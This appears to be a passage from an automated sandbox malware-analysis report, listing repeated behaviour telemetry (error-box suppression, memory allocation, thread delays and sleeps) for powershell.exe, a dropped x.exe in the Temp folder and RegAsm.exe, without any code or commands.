            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 2BE0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 2CA0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 2BE0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 52B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 62B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 63E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 73E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 1410000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 31D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2E70000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599671Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599559Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599444Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599217Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599104Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598787Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598649Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598530Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598421Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598312Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598203Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598093Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597984Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597871Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597750Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597640Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597526Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597406Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597297Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597184Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597062Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596953Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596843Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596734Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596625Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596515Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596406Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596297Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596186Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596078Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595968Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595859Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595750Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595640Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595531Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595421Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595312Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595203Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595093Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594984Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594875Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594759Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594640Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594526Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594404Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594294Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594172Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 593984Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 593744Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 593609Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3402Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 514Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 2100Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 7724Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: foregroundWindowGot 1767Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8132Thread sleep time: -2767011611056431s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8096Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 8160Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep count: 37 > 30Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -34126476536362649s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7664Thread sleep count: 2100 > 30Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -599890s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7664Thread sleep count: 7724 > 30Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -599781s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -599671s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -599559s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -599444s >= -30000sJump to behavior
